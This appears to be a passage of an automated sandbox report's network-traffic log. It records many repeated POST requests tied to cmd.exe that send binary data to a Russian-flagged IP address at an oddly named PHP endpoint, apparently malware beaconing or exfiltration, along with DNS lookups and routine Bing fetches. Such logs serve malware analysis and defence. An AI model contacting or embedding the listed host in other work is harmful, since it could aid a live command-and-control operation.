        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:32 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:33 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1724
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:35 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:36 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:37 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:39 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:40 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:42 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:43 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:44 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:45 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:47 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:48 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:49 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:50 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:52 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:53 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:55 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:56 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:58 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:05:59 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:01 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:02 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:03 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1724
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:04 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:05 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:06 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:08 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:09 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:06:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1300
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:10 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-us
        DNS
        235.242.120.188.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        235.242.120.188.in-addr.arpa
        IN PTR
        Response
        235.242.120.188.in-addr.arpa
        IN PTR
        zenaprigozin78fvdsru
      • flag-us
        DNS
        26.165.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.165.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        15.164.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        15.164.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        24.121.18.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        24.121.18.2.in-addr.arpa
        IN PTR
        Response
        24.121.18.2.in-addr.arpa
        IN PTR
        a2-18-121-24deploystaticakamaitechnologiescom
      • flag-ru
        POST
        http://188.120.242.235/ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php
        cmd.exe
        Remote address:
        188.120.242.235:80
        Request
        POST /ExternalPythonPhpSecuretrafficTestlocaltempUploadsDownloads.php HTTP/1.1
        Content-Type: application/octet-stream
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
        Host: 188.120.242.235
        Content-Length: 1740
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Sat, 11 May 2024 08:04:41 GMT
        Server: Apache/2.4.41 (Ubuntu)
        Vary: Accept-Encoding
        Content-Length: 152
        Content-Type: text/html; charset=UTF-8
      • flag-us
        DNS
        77.190.18.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        77.190.18.2.in-addr.arpa
        IN PTR
        Response
        77.190.18.2.in-addr.arpa
        IN PTR
        a2-18-190-77deploystaticakamaitechnologiescom
      • flag-us
        DNS
        26.35.223.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.35.223.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        tse1.mm.bing.net
        Remote address:
        8.8.8.8:53
        Request
        tse1.mm.bing.net
        IN A
        Response
        tse1.mm.bing.net
        IN CNAME
        mm-mm.bing.net.trafficmanager.net
        mm-mm.bing.net.trafficmanager.net
        IN CNAME
        dual-a-0001.a-msedge.net
        dual-a-0001.a-msedge.net
        IN A
        204.79.197.200
        dual-a-0001.a-msedge.net
        IN A
        13.107.21.200
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
        Remote address:
        204.79.197.200:443
        Request
        GET /th?id=OADD2.10239381702593_1BLW9LYE0FMIB48EX&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 464243
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 76F4FA2EEFB541AEACF0FAE67A930A72 Ref B: LON04EDGE0720 Ref C: 2024-05-11T08:05:35Z
        date: Sat, 11 May 2024 08:05:35 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
        Remote address:
        204.79.197.200:443
        Request
        GET /th?id=OADD2.10239381705589_1UZ6HI7DU1RQLXLFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 499516
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 5EBE91193A2244FE866DDDDCA944F5C8 Ref B: LON04EDGE0720 Ref C: 2024-05-11T08:05:35Z
        date: Sat, 11 May 2024 08:05:35 GMT
      • flag-us
        GET
        https://tse1.mm.bing.net/th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
        Remote address:
        204.79.197.200:443
        Request
        GET /th?id=OADD2.10239381702592_1OT5ET7HCG1M9EIRY&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
        host: tse1.mm.bing.net
        accept: */*
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-length: 476246
        content-type: image/jpeg
        x-cache: TCP_HIT
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 209DA1DA86C1441392CBC52F07142CB2 Ref B: LON04EDGE0720 Ref C: 2024-05-11T08:05:35Z
        date: Sat, 11 May 2024 08:05:35 GMT
      • flag-us
        GET
